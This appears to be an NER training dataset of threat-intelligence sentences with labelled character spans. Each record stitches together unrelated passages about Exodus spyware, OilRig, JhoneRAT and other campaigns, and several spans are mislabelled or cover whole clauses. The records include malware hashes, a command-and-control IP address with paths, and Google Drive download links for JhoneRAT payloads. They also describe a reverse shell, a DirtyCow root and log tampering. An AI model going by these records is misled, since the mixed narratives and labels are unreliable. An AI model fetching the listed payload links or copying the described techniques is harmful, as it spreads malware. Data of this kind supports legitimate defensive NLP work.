It checks for new commands in the tweets from the handle @jhone87438316 ( suspended by Twitter ) every 10 seconds using the BeautifulSoup HTML parser to identify new tweets . Researchers first spotted the activity in March 2021 , but the MuddyWater campaign began in October 2019 targeting an Asian airline to steal flight reservation and continued to 2021 .", "spans": [{"start": 44, "end": 49, "label": "Organization"}, {"start": 132, "end": 144, "label": "Organization"}, {"start": 180, "end": 188, "label": "System"}, {"start": 311, "end": 318, "label": "System"}, {"start": 348, "end": 373, "label": "System"}, {"start": 462, "end": 481, "label": "Organization"}, {"start": 517, "end": 530, "label": "Organization"}]} {"text": "Exodus is equipped with extensive collection and interception capabilities . In August 2017 , we found this threat group has developed yet another Trojan that they call ' Agent Injector ' with the specific purpose of installing the ISMAgent backdoor . These commands can be issued to a specific victim based on the UID generated on each target ( by using the disk serial and contextual information such as the hostname , the antivirus and the OS ) or to all of them . One explanation for this could be that that they used the region as a test zone ; another would be that the threat actor runs the operation from those locations , although it could also be a false flag meant to point the researchers on the wrong path .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 108, "end": 120, "label": "Organization"}, {"start": 232, "end": 249, "label": "System"}, {"start": 576, "end": 588, "label": "Organization"}]} {"text": "Worryingly , some of the modifications enforced by the spyware might expose the infected devices to further compromise or data tampering . On August 23 , 2017 , we observed OilRig targeting an organization within the United Arab Emirates government . The Exfiltration , however , is done via other cloud providers . 
However , the problem in general with labeling every ransomware attack as sophisticated is that it excuses the organization that has nt followed the basic preventative best practices .", "spans": [{"start": 173, "end": 179, "label": "Organization"}, {"start": 238, "end": 248, "label": "Organization"}, {"start": 298, "end": 313, "label": "System"}]} {"text": "Disguised Spyware Uploaded on Google Play Store We identified previously unknown spyware apps being successfully uploaded on Google Play Store multiple times over the course of over two years . Based on that research and this observation , we postulate that the OilRig group gathered credentials to a legitimate user 's OWA account and logged into the user 's account to send phishing attacks to other individuals within the same , targeted organization . The screenshots are exfiltrated via the ImgBB website . The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online , but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service .", "spans": [{"start": 30, "end": 47, "label": "System"}, {"start": 125, "end": 142, "label": "System"}, {"start": 262, "end": 274, "label": "Organization"}, {"start": 496, "end": 501, "label": "System"}, {"start": 535, "end": 543, "label": "Organization"}, {"start": 584, "end": 598, "label": "Organization"}, {"start": 637, "end": 645, "label": "Organization"}]} {"text": "These apps would remain available on the Play Store for months and would eventually be re-uploaded . The OilRig group continues to target organizations in the Middle East , in this instance targeting the government of the United Arab Emirates . The remaining commands send feedback by posting data into Google Forms . 
There are also many examples of nation - state actors leveraging contractors to develop offensive capabilities , as shown most recently in contracts between Russia \u2019s Ministry of Defense and NTC Vulkan .", "spans": [{"start": 41, "end": 51, "label": "System"}, {"start": 105, "end": 117, "label": "Organization"}, {"start": 204, "end": 214, "label": "Organization"}, {"start": 303, "end": 315, "label": "System"}, {"start": 350, "end": 371, "label": "Organization"}, {"start": 475, "end": 504, "label": "Organization"}, {"start": 509, "end": 519, "label": "Organization"}]} {"text": "While details would vary , all of the identified copies of this spyware shared a similar disguise . The payload embedded within the ISMInjector sample delivered in this attack is a variant of the ISMAgent backdoor that we had discussed in detail in our blog discussing a targeted attack on a Saudi Arabian technology company . Finally , the RAT is able to download files encoded in base64 on Google Drive . [ As the documentary points out , the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison , which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy ] .", "spans": [{"start": 132, "end": 150, "label": "System"}, {"start": 196, "end": 213, "label": "System"}, {"start": 306, "end": 324, "label": "Organization"}, {"start": 341, "end": 344, "label": "System"}, {"start": 392, "end": 404, "label": "System"}, {"start": 441, "end": 644, "label": "Organization"}]} {"text": "In most cases they would be crafted to appear as applications distributed by unspecified mobile operators in Italy . Initial inspection of this attack suggested this was again the OilRig campaign using their existing toolset , but further examination revealed not only new variants of the delivery document we named Clayslide , but also a different payload embedded inside it . 
Feature-wise , the RAT has three commands : UNC2529 displayed indications of target research based on their selection of sender email addresses and subject lines which were tailored to their intended victims .", "spans": [{"start": 316, "end": 325, "label": "System"}, {"start": 397, "end": 400, "label": "System"}, {"start": 422, "end": 429, "label": "Organization"}, {"start": 455, "end": 521, "label": "Indicator"}, {"start": 526, "end": 585, "label": "Indicator"}]} {"text": "Often the app description on the Play Store would reference some SMS messages the targets would supposedly receive leading them to the Play Store page . In July 2017 , we observed an attack on a Middle Eastern technology organization that was also targeted by the OilRig campaign in August 2016 . Take a screenshot and upload it to ImgBB . The Malwarebytes Threat Intelligence team is a highly skilled group of malware analysts .", "spans": [{"start": 33, "end": 43, "label": "System"}, {"start": 135, "end": 145, "label": "System"}, {"start": 210, "end": 233, "label": "Organization"}, {"start": 332, "end": 337, "label": "System"}, {"start": 344, "end": 381, "label": "Organization"}]} {"text": "All of the Play Store pages we identified and all of the decoys of the apps themselves are written in Italian . This technique was observed in previous Clayslide documents to access the script variant of the Helminth Trojan in earlier OilRig attacks . Download binary disguised has a picture from Google Drive and execute it . 
For example , the government was credited with leading a multicountry operation to hack the ransomware group REvil , forcing it offline .", "spans": [{"start": 11, "end": 21, "label": "System"}, {"start": 152, "end": 171, "label": "System"}, {"start": 297, "end": 309, "label": "System"}, {"start": 345, "end": 355, "label": "Organization"}, {"start": 419, "end": 441, "label": "Organization"}]} {"text": "According to Google , whom we have contacted to alert about our discoveries , nearly 25 variants of this spyware were uploaded on Google Play Store . In the past , we had primarily associated the OilRig campaign with using the Clayslide documents to deliver as a payload a Trojan we named Helminth ; in this instance , the payload was instead a variant of the ISMDoor Trojan with significant modifications which we are now tracking as ISMAgent . Execute a command and send the output to Google Forms . Once encryption is complete , it attempts to delete Volume Shadow VSS copies .", "spans": [{"start": 13, "end": 19, "label": "Organization"}, {"start": 130, "end": 147, "label": "System"}, {"start": 227, "end": 246, "label": "System"}, {"start": 289, "end": 297, "label": "System"}, {"start": 360, "end": 374, "label": "System"}, {"start": 435, "end": 443, "label": "System"}, {"start": 487, "end": 499, "label": "System"}]} {"text": "Google Play has removed the apps and they stated that \" thanks to enhanced detection models , Google Play Protect will now be able to better detect future variants of these applications '' . The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet . The attacker put a couple of tricks in place to avoid execution on virtual machines ( sandbox ) . 
Budworm has targeted victims in many countries in Southeast Asia and the Middle East , among other locations , including the U.S. Symantecs Threat Hunter Team published a blog in October 2022 detailing how Budworm activity was seen on the network of a U.S. state legislature .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 94, "end": 113, "label": "System"}, {"start": 215, "end": 224, "label": "System"}, {"start": 244, "end": 273, "label": "Malware"}, {"start": 287, "end": 314, "label": "System"}, {"start": 611, "end": 618, "label": "System"}, {"start": 623, "end": 630, "label": "Organization"}, {"start": 644, "end": 651, "label": "Organization"}, {"start": 753, "end": 781, "label": "Organization"}, {"start": 829, "end": 845, "label": "Indicator"}, {"start": 875, "end": 897, "label": "Organization"}]} {"text": "While Google did not share with us the total number of infected devices , they confirmed that one of these malicious apps collected over 350 installations through the Play Store , while other variants collected few dozens each , and that all infections were located in Italy . Clearly , OilRig incorporates a testing component within their development process , as we have previously observed OilRig performing testing activities on their delivery documents and their TwoFace webshells . The first trick is the check of the serial number of the disk . 
Between April 2022 and March 2023 , 39 % of the gang 's attacks hit education , compared to an average of just 4 % across all the other ransomware groups tracked by Malwarebytes .", "spans": [{"start": 167, "end": 177, "label": "System"}, {"start": 287, "end": 293, "label": "Organization"}, {"start": 393, "end": 399, "label": "Organization"}, {"start": 439, "end": 457, "label": "System"}, {"start": 468, "end": 485, "label": "System"}, {"start": 620, "end": 629, "label": "Organization"}, {"start": 688, "end": 705, "label": "Organization"}, {"start": 717, "end": 729, "label": "Organization"}]} {"text": "We have directly observed multiple copies of Exodus with more than 50 installs and we can estimate the total number of infections to amount in the several hundreds , if not a thousand or more . While continuing research on the August 2018 attacks on a Middle eastern government that delivered BONDUPDATER , Unit 42 researchers observed OilRig 's testing activities and with high confidence links this testing to the creation of the weaponized delivery document used in this attack . The actor used the same technique in the macro and in the JhoneRAT . A main goal of this attack was to obtain access to email accounts .", "spans": [{"start": 45, "end": 51, "label": "Malware"}, {"start": 267, "end": 277, "label": "Organization"}, {"start": 293, "end": 304, "label": "System"}, {"start": 307, "end": 314, "label": "Organization"}, {"start": 336, "end": 342, "label": "Organization"}, {"start": 524, "end": 529, "label": "System"}, {"start": 541, "end": 549, "label": "Malware"}]} {"text": "Stage 1 : Exodus One The first stage installed by downloading the malicious apps uploaded on Google Play Store only acts as a dropper . 
While investigating recent attacks performed by the threat actor group OilRig using their new Bondupdater version , Unit 42 researchers searched for additional Microsoft Office documents used by OilRig hoping to locate additional malware being used in other attacks during the same time period . By default , most of the virtual machines do not have a serial number on the disk . Some groups are even exploiting zero - day vulnerabilities , allowing them to cast a wider net of victims .", "spans": [{"start": 10, "end": 20, "label": "Malware"}, {"start": 93, "end": 110, "label": "System"}, {"start": 188, "end": 213, "label": "Organization"}, {"start": 230, "end": 241, "label": "System"}, {"start": 252, "end": 259, "label": "Organization"}, {"start": 331, "end": 337, "label": "Organization"}, {"start": 521, "end": 527, "label": "Organization"}, {"start": 548, "end": 574, "label": "Vulnerability"}]} {"text": "Following are some examples of the decoys used by these droppers : The purpose of Exodus One seems to be to collect some basic identifying information about the device ( namely the IMEI code and the phone number ) and send it to the Command & Control server . The tester created the final test file less than 8 hours before the creation time of a delivery document , which was then delivered via a spear-phishing email 20 minutes later . The attacker used a second trick to avoid analysis of the python code . There was a massive decrease in the activity from Royal , for example , which normally dominates the monthly rankings \u2014 often cracking into the top five \u2014 with an average of roughly 30 attacks a month in that period .", "spans": [{"start": 82, "end": 92, "label": "Malware"}, {"start": 496, "end": 502, "label": "System"}, {"start": 560, "end": 565, "label": "Organization"}]} {"text": "This is usually done in order to validate the target of a new infection . 
During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface \u2013 test.xls . The actor used the same trick that FireEye in the Flare-On 6 : Challenge 7: They removed the header of the python bytecode . Leveraging this access , an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption .", "spans": [{"start": 213, "end": 233, "label": "Malware"}, {"start": 238, "end": 265, "label": "Malware"}, {"start": 303, "end": 310, "label": "Organization"}, {"start": 318, "end": 328, "label": "System"}, {"start": 375, "end": 381, "label": "System"}]} {"text": "This is further corroborated by some older and unobfuscated samples from 2016 , whose primary classes are named CheckValidTarget . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 . It can be perfectly executed without the header , but tools such as uncompyle6 need this header : $ uncompyle6 final2 . 
None : While OT - oriented malware families can be purpose built for a particular target environment , malware that takes advantage of insecure by design OT protocols , such as LIGHTWORK \u2019s abuse of the IEC-104 protocol , can be modified and employed multiple times to target multiple victims .", "spans": [{"start": 178, "end": 184, "label": "Organization"}, {"start": 357, "end": 367, "label": "Organization"}, {"start": 370, "end": 380, "label": "Malware"}, {"start": 558, "end": 568, "label": "System"}, {"start": 590, "end": 600, "label": "System"}, {"start": 617, "end": 653, "label": "Organization"}, {"start": 787, "end": 799, "label": "Malware"}, {"start": 813, "end": 829, "label": "Vulnerability"}]} {"text": "During our tests the spyware was upgraded to the second stage on our test device immediately after the first check-ins . However , they later continued by making modifications to the Excel document just prior to the attack on August 26th . ImportError : Unknown magic number 227 in final2 . Therefore can be no leakage on our part .", "spans": [{"start": 291, "end": 330, "label": "Indicator"}]} {"text": "This suggests that the operators of the Command & Control are not enforcing a validation of the targets . HELIX KITTEN is likely an Iranian-based adversary group , active since at least late 2015 , targeting organizations in the aerospace , energy , financial , government , hospitality and telecommunications business verticals . Additionally , the generated code by uncompyle6 varies depending on the version and the impact is important . 
Cisco Secure Malware Analytics ( formerly Threat Grid ) identifies malicious binaries and builds protection into all Cisco Secure products .", "spans": [{"start": 106, "end": 118, "label": "Organization"}, {"start": 156, "end": 161, "label": "Organization"}, {"start": 229, "end": 238, "label": "Organization"}, {"start": 241, "end": 247, "label": "Organization"}, {"start": 250, "end": 259, "label": "Organization"}, {"start": 262, "end": 272, "label": "Organization"}, {"start": 275, "end": 286, "label": "Organization"}, {"start": 291, "end": 318, "label": "Organization"}, {"start": 368, "end": 378, "label": "System"}, {"start": 441, "end": 471, "label": "System"}, {"start": 483, "end": 494, "label": "System"}]} {"text": "Additionally , during a period of several days , our infected test device was never remotely disinfected by the operators . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel . Based on our analysis and the behaviour of the executed malware , the correct interpretation is the first one based on the oldest version of uncompyle6 . The vendor declined to release an update within the 90 - day period as outlined in Cisco \u2019s vulnerability disclosure policy .", "spans": [{"start": 139, "end": 158, "label": "Organization"}, {"start": 294, "end": 303, "label": "Organization"}, {"start": 447, "end": 457, "label": "System"}, {"start": 543, "end": 551, "label": "Organization"}]} {"text": "For the purpose of this report we analyze here the Exodus One sample with hash 8453ce501fee1ca8a321f16b09969c517f92a24b058ac5b54549eabd58bf1884 which communicated with the Command & Control server at 54.71.249.137 . In addition to Helminth , the ISMDoor implant is likely used by the Iran-based adversary to attack targets particularly those in the Middle East region . 
For this specific condition , it is important because it 's filtering on the keyboard layout to identify the targets . A careful analysis of the domain registrations from this threat actor between 2014 and 2015 allowed us to identify one profile used to register several domains that were used as C&C servers for a particular malware family employed by the Winnti group .", "spans": [{"start": 51, "end": 61, "label": "Malware"}, {"start": 79, "end": 143, "label": "Indicator"}, {"start": 200, "end": 213, "label": "Indicator"}, {"start": 231, "end": 239, "label": "System"}, {"start": 246, "end": 253, "label": "System"}, {"start": 489, "end": 739, "label": "Malware"}]} {"text": "Other samples communicated with other servers listed at the bottom of this report . These incidents involved spear-phishing attacks , which characteristic of HELIX KITTEN , included emails containing malicious PowerShell in their macros that connects to known C2 infrastructure . This campaign shows a threat actor interested in specific Middle Eastern and Arabic-speaking countries . With regards to these similarities , we highlight the following trends which could manifest in future OT malware : \u2022", "spans": [{"start": 158, "end": 170, "label": "Organization"}, {"start": 210, "end": 220, "label": "System"}, {"start": 487, "end": 497, "label": "Malware"}]} {"text": "Exodus One checks-in by sending a POST request containing the app package name , the device IMEI and an encrypted body containing additional device information . During the summer of 2018 , HELIX KITTEN actors were observed targeting entities in the Middle East \u2014 of note , targets appeared to be located in Bahrain and Kuwait . It also shows us an actor that puts effort in opsec by only using cloud providers . 
This technique has been used by the group for some time , with reports of INISafeWebSSO being leveraged dating as far back as 2018 .", "spans": [{"start": 190, "end": 209, "label": "Organization"}, {"start": 375, "end": 380, "label": "System"}, {"start": 395, "end": 410, "label": "System"}, {"start": 449, "end": 454, "label": "Organization"}, {"start": 487, "end": 500, "label": "System"}]} {"text": "The encrypted body is composed of various identifiers which are joined together : doFinal ( ) is called to encrypt the device information string : The user agent string is built from the package name and IMEI number : Finally the HTTP request is sent to the server at https : //54.71.249.137/eddd0317-2bdc-4140-86cb-0e8d7047b874 . ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine . The malicious documents , the droppers and the RAT itself are developed around cloud providers . The PDF usually named \u201c CriticalBreachDetected.pdf \u201d is generated using content embedded in the ransomware binary , including the skeleton PDF and the ransom note .", "spans": [{"start": 268, "end": 328, "label": "Indicator"}, {"start": 331, "end": 338, "label": "System"}, {"start": 350, "end": 365, "label": "Malware"}, {"start": 368, "end": 384, "label": "Malware"}, {"start": 391, "end": 417, "label": "Malware"}, {"start": 492, "end": 495, "label": "System"}, {"start": 524, "end": 539, "label": "System"}, {"start": 542, "end": 594, "label": "Indicator"}]} {"text": "Many of the strings in the application are XOR 'd with the key Kjk1MmphFG : After some additional requests , the dropper made a POST request to https : //54.71.249.137/56e087c9-fc56-49bb-bbd0-4fafc4acd6e1 which returned a zip file containing the second stage binaries . In early November 2018 , CrowdStrike observed activity from the HELIX KITTEN adversary at a customer in the telecommunications vertical . 
Additionally the attackers implemented anti-VM ( and sandbox ) and anti-analysis tricks to hide the malicious activities to the analyst . Harrison signed his threatening missive with the salutation , \u201c We are legion , \u201d suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers .", "spans": [{"start": 144, "end": 204, "label": "Indicator"}, {"start": 295, "end": 306, "label": "Organization"}, {"start": 334, "end": 346, "label": "Organization"}, {"start": 378, "end": 396, "label": "Organization"}, {"start": 447, "end": 454, "label": "System"}, {"start": 461, "end": 468, "label": "System"}, {"start": 475, "end": 495, "label": "System"}, {"start": 546, "end": 554, "label": "Organization"}, {"start": 685, "end": 699, "label": "Organization"}]} {"text": "Stage 2 : Exodus Two The Zip archive returned by the check-in performed by Exodus One is a collection of files including the primary payload mike.jar and several compiled utilities that serve different functions . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East . For example , the VM or the sandbox must have the keyboard layout of the targeted countries and a disk serial number . 
While the Kritec skimmer hangs around the Google Tag Manager script , we believe it is not related to the other active campaigns .", "spans": [{"start": 10, "end": 20, "label": "Malware"}, {"start": 75, "end": 85, "label": "Malware"}, {"start": 141, "end": 149, "label": "Indicator"}, {"start": 218, "end": 227, "label": "Organization"}, {"start": 274, "end": 283, "label": "Malware"}, {"start": 287, "end": 326, "label": "Organization"}, {"start": 366, "end": 368, "label": "System"}, {"start": 376, "end": 383, "label": "System"}, {"start": 477, "end": 491, "label": "Malware"}, {"start": 509, "end": 534, "label": "Malware"}, {"start": 586, "end": 595, "label": "Organization"}]} {"text": "At least in most recent versions , as of January 2019 , the Zip archive would actually contain the i686 , arm and arm64 versions of all deployed binaries . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region . This campaign started in November 2019 and it is still ongoing . According to Kaspersky telemetry , targeted organizations included political bodies in Europe .", "spans": [{"start": 188, "end": 202, "label": "Organization"}, {"start": 242, "end": 263, "label": "Malware"}, {"start": 287, "end": 292, "label": "Organization"}, {"start": 399, "end": 408, "label": "Organization"}, {"start": 453, "end": 469, "label": "Organization"}]} {"text": "File Name Modified Date SHA256 null_arm 2018-02-27 06:44:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 null_i686 2018-02-27 06:44:00 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 null_arm64 2018-02-27 06:43:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 Our data suggests that actors have deployed the RGDoor backdoor on webservers belonging to eight Middle Eastern government organizations , as well as one financial and one educational institution . 
At this time , the API key is revoked and the Twitter account is suspended . Analysis of memory core dump files", "spans": [{"start": 60, "end": 124, "label": "Indicator"}, {"start": 155, "end": 219, "label": "Indicator"}, {"start": 251, "end": 315, "label": "Indicator"}, {"start": 339, "end": 345, "label": "Organization"}, {"start": 364, "end": 379, "label": "System"}, {"start": 428, "end": 452, "label": "Organization"}, {"start": 470, "end": 479, "label": "Organization"}, {"start": 488, "end": 511, "label": "Organization"}, {"start": 560, "end": 567, "label": "System"}]} {"text": "sepolicy-inject_arm 2019-01-08 04:55:00 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 sepolicy-inject_arm64 2019-01-08 04:55:00 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a sepolicy-inject_i686 2019-01-08 04:55:00 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 In August 2018 , Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER . However , the attacker can easily create new accounts and update the malicious files in order to still work . 
LIGHTWORK ( filename : OT_T855_IEC104_GR.exe ) ( MD5 : 7b6678a1c0000344f4faf975c0cfc43d ) is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": [{"start": 40, "end": 104, "label": "Indicator"}, {"start": 147, "end": 211, "label": "Indicator"}, {"start": 253, "end": 317, "label": "Indicator"}, {"start": 335, "end": 342, "label": "Organization"}, {"start": 352, "end": 358, "label": "Organization"}, {"start": 371, "end": 394, "label": "Organization"}, {"start": 474, "end": 485, "label": "System"}, {"start": 598, "end": 607, "label": "System"}, {"start": 610, "end": 642, "label": "Indicator"}, {"start": 647, "end": 685, "label": "Indicator"}, {"start": 688, "end": 797, "label": "Malware"}]} {"text": "rootdaemon_arm 2019-01-08 04:55:00 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 rootdaemon_arm64 2019-01-08 04:55:00 3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 mike.jar 2018-12-06 05:50:00 a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e The OilRig group has been active since at least mid-2016 , and continues their attack campaigns throughout the Middle East , targeting both governmental agencies and businesses on an almost routine basis . This campaign shows us that network-based detection is important but must be completed by system behaviour analysis . 
KillMilk : Self - Proclaimed Founder of KillNet", "spans": [{"start": 35, "end": 99, "label": "Indicator"}, {"start": 137, "end": 201, "label": "Indicator"}, {"start": 202, "end": 210, "label": "Indicator"}, {"start": 231, "end": 295, "label": "Indicator"}, {"start": 300, "end": 312, "label": "Organization"}, {"start": 436, "end": 457, "label": "Organization"}, {"start": 462, "end": 472, "label": "Organization"}, {"start": 620, "end": 628, "label": "Organization"}, {"start": 660, "end": 667, "label": "Organization"}]} {"text": "rootdaemon_i686 2019-01-08 04:55:00 b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 zygotedaemonarm 2019-01-08 04:55:00 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f zygotedaemonarm64 2019-01-08 04:55:00 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017 , when OilRig targeted a different Middle Eastern governmental organization . JhoneRAT : 273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f . 
Marlin is a notable split from OilRigs typical TTPs .", "spans": [{"start": 36, "end": 100, "label": "Indicator"}, {"start": 137, "end": 201, "label": "Indicator"}, {"start": 240, "end": 304, "label": "Indicator"}, {"start": 305, "end": 316, "label": "System"}, {"start": 322, "end": 345, "label": "System"}, {"start": 366, "end": 373, "label": "Organization"}, {"start": 402, "end": 408, "label": "Organization"}, {"start": 445, "end": 470, "label": "Organization"}, {"start": 473, "end": 481, "label": "Malware"}, {"start": 484, "end": 548, "label": "Indicator"}, {"start": 551, "end": 557, "label": "Malware"}, {"start": 582, "end": 589, "label": "Organization"}]} {"text": "zygotedaemoni686 2019-01-08 04:55:00 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 sapp.apk 2019-01-08 04:53:00 4bf1446c412dd5c552539490d03e999a6ceb96ae60a9e7846427612bec316619 placeholder 2018-03-29 16:31:00 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 During the past month , Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware , which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications . JhoneRAT : 29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091 . 
Adversaries may perform data destruction over the course of an operation .", "spans": [{"start": 37, "end": 101, "label": "Indicator"}, {"start": 102, "end": 110, "label": "Indicator"}, {"start": 131, "end": 195, "label": "Indicator"}, {"start": 228, "end": 292, "label": "Indicator"}, {"start": 317, "end": 324, "label": "Organization"}, {"start": 375, "end": 385, "label": "Organization"}, {"start": 423, "end": 442, "label": "System"}, {"start": 506, "end": 519, "label": "System"}, {"start": 557, "end": 565, "label": "Malware"}, {"start": 568, "end": 632, "label": "Indicator"}]} {"text": "After download , Exodus One would dynamically load and execute the primary stage 2 payload mike.jar using the Android API DexClassLoader ( ) . The email had no subject and what initially drew our attention to OilRig 's attack was the content of the spear phishing email . JhoneRAT : d5f10a0b5c103100a3e74aa9014032c47aa8973b564b3ab03ae817744e74d079 . Among the group \u2019s most interesting characteristics are : \u2022 Strong functional and structural similarities linking its malware toolset to early MiniDuke and more recent CosmicDuke and OnionDuke components In early 2013 , GReAT observed several incidents that were so unusual they suggested the existence of a new , previously unknown threat actor .", "spans": [{"start": 17, "end": 27, "label": "Malware"}, {"start": 91, "end": 99, "label": "Indicator"}, {"start": 110, "end": 121, "label": "System"}, {"start": 209, "end": 215, "label": "Organization"}, {"start": 272, "end": 280, "label": "Malware"}, {"start": 283, "end": 347, "label": "Indicator"}, {"start": 493, "end": 501, "label": "Malware"}, {"start": 518, "end": 528, "label": "Malware"}, {"start": 533, "end": 542, "label": "Malware"}, {"start": 570, "end": 575, "label": "Organization"}]} {"text": "mike.jar implements most of the data collection and exfiltration capabilities of this spyware . 
As expected , OilRig is continuing their onslaught of attacks well into 2018 with continued targeting in the Middle East . JhoneRAT : 6cc0c11c754e1e82bca8572785c27a364a18b0822c07ad9aa2dc26b3817b8aa4 . NIST does not necessarily endorse the views expressed , or concur with the facts presented on these sites .", "spans": [{"start": 0, "end": 8, "label": "Indicator"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 219, "end": 227, "label": "Malware"}, {"start": 230, "end": 294, "label": "Indicator"}, {"start": 297, "end": 301, "label": "Organization"}]} {"text": "Of the various binaries downloaded , the most interesting are null , which serves as a local and reverse shell , and rootdaemon , which takes care of privilege escalation and data acquisition . First identified in January 2015 , Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims . JhoneRAT : 7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69 . Antivirus software identifies threats by matching a particular piece of softwares code to programs it has identified as malicious in its database .", "spans": [{"start": 403, "end": 411, "label": "Malware"}, {"start": 414, "end": 478, "label": "Indicator"}, {"start": 481, "end": 499, "label": "Organization"}]} {"text": "rootdaemon will first attempt to jailbreak the device using a modified version of the DirtyCow exploit . According to Symantec telemetry , almost 40 percent of Orangeworm 's confirmed victim organizations operate within the healthcare industry . JhoneRAT : b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366 . 
Will Harrison was terminated as an Ashley Madison employee in November 2011 , and by early 2012 he \u2019d turned his considerable harassment skills squarely against the company .", "spans": [{"start": 86, "end": 102, "label": "Vulnerability"}, {"start": 118, "end": 126, "label": "Organization"}, {"start": 224, "end": 243, "label": "Organization"}, {"start": 246, "end": 254, "label": "Malware"}, {"start": 257, "end": 321, "label": "Indicator"}, {"start": 324, "end": 337, "label": "Organization"}, {"start": 359, "end": 373, "label": "Organization"}]} {"text": "Similarly to another Android spyware made in Italy , originally discovered by Lukas Stefanko and later named Skygofree and analyzed in depth by Kaspersky Labs , Exodus also takes advantage of \" protectedapps '' , a feature in Huawei phones that allows to configure power-saving options for running applications . Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents . JhoneRAT : https://drive.google.com/uc?export=download&id=1vED0wN0arm9yu7C7XrbCdspLjpoPKfrQ . 
Notably , CADDYWIPER has been the most frequently used disruptive tool against Ukrainian entities during the war and has seen consistent operational use since March 2022 , based on public reporting .", "spans": [{"start": 21, "end": 28, "label": "System"}, {"start": 109, "end": 118, "label": "Malware"}, {"start": 144, "end": 158, "label": "Organization"}, {"start": 161, "end": 167, "label": "Malware"}, {"start": 226, "end": 232, "label": "Organization"}, {"start": 429, "end": 446, "label": "Organization"}, {"start": 501, "end": 515, "label": "Malware"}, {"start": 518, "end": 526, "label": "Malware"}, {"start": 529, "end": 613, "label": "Malware"}, {"start": 626, "end": 636, "label": "Malware"}, {"start": 695, "end": 713, "label": "Organization"}]} {"text": "By manipulating a SQLite database , Exodus is able to keep itself running even when the screen goes off and the application would otherwise be suspended to reduce battery consumption . Sowbug 's next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents . JhoneRAT : https://drive.google.com/uc?export=download&id=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl . 
The campaigns we discovered also involve malicious files intended for users in Poland .", "spans": [{"start": 36, "end": 42, "label": "Malware"}, {"start": 185, "end": 191, "label": "Organization"}, {"start": 305, "end": 322, "label": "Organization"}, {"start": 377, "end": 391, "label": "Malware"}, {"start": 394, "end": 402, "label": "Malware"}, {"start": 405, "end": 489, "label": "Indicator"}, {"start": 562, "end": 577, "label": "Organization"}]} {"text": "Additionally , rootdaemon attempts to remove its own power usage statistics from Huawei phones ' SystemManager : Similarly , the malicious application probably attempts to minimize traces on Samsung phones by adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/apm_sp_status_of_apps.xml the following lines : And adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/com.samsung.android.securitylogagent_preferences.xml For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug . JhoneRAT : https://drive.google.com/uc?export=download&id=1OlQssMvjb7gI175qDx8SqTgRJIEp5Ypd . Money", "spans": [{"start": 81, "end": 87, "label": "Organization"}, {"start": 191, "end": 198, "label": "Organization"}, {"start": 228, "end": 314, "label": "Indicator"}, {"start": 360, "end": 473, "label": "Indicator"}, {"start": 508, "end": 514, "label": 